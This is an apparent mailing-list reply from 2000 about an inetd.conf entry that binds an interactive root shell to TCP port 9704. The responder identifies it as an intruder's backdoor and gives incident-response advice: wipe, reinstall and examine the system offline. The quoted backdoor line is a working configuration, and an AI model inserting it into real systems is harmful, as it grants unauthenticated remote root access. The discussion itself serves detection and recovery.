Re: Possible widespread hole?

[Alexander Schreiber <Alexander.Schreiber () INFORMATIK TU-CHEMNITZ DE>]

Hi !

On Sat, 26 Aug 2000 c_patin () HOTMAIL COM wrote:

> Hi guys,
>       I was snooping around my box yesterday, and noticed the
> following MAJOR hole listed at the bottom of
> /etc/inetd.conf:
> 9704 stream tcp nowait root /bin/sh sh -i

This is not just a ''security hole'', it's a big fat bright red blinking
neon sign yelling at the top of it's lungs ''YOU HAVE BEEN HACKED''.

You have been hacked successfully. I *strongly* suggest you take this
system offline, boot from the install CDs, maybe backup the entire system
for later analysis and *reinstall* the system from *scratch*.

Did you note the latest change time on the /etc/inetd.conf before ''fixing''
this ''security hole''? Depending on the root kit (or the skills of the
attacker, but I guess it was Yet Another Script Kiddie (TM)) this
date was not ''fixed'' so it _might_ _possibly_ give a hint to the time
of the intrusion.

Anyway, you can rely on this not being the only backdoor left on your system.
When you are done wiping the systems disks, reinstalling the system from
the original media (no backups - you might be reloading the hacked system)
and applying the latest security patches I suggest you put that freshly made
backup of a hacked system onto a spare test machine with _no_ net connection,
boot it from known clean media (the rescue set on the install CDs comes to
mind) and start poking around the hacked system. Look out for things like
modified versions of login, ps, telnetd, sshd, finger, who and the like.

> I have since closed the hole, and placed my box behind a
> hardware firewall to protect it. But the interesting thing

Too late.

> is that I was reading Slashdot a little while ago and
> mentioned this in an article about security. And someone
> else had the same exact hole listed inside of his
> /etc/inetd.conf. Is this possibly some major hole in a
> package that we both installed, or did we just get hacked by
> the same person. Seems a little weird to just be
> coincidence. Any advice or ideas?

_If_ this was in a package on your vendors media I'm pretty sure that said
vendor would have gotten his ass kicked _real_ hard be the security
community. Plus he might even got sued. If it was in a package you got from
somewhere on the net the author of this package would most likely already
gotten a public beating in bugtraq. So, this is unlikely.

Especially since putting root shells on random (or innocent looking) ports
is one of the telltale signatures of a successfull breakin. No, you have
been broken into and you secure your system (and keep them up to date
with the security patches) to reduce the possibility of this happening
again.

Regards,
       Alex.

--
------------------------------------------------------------------------------
 EMail : als () thangorodrim de              | WWW : http://www.thangorodrim.de/
 "I think there's a world market for about five computers."
         -- attr. Thomas J. Watson (Chairman of the Board, IBM), 1943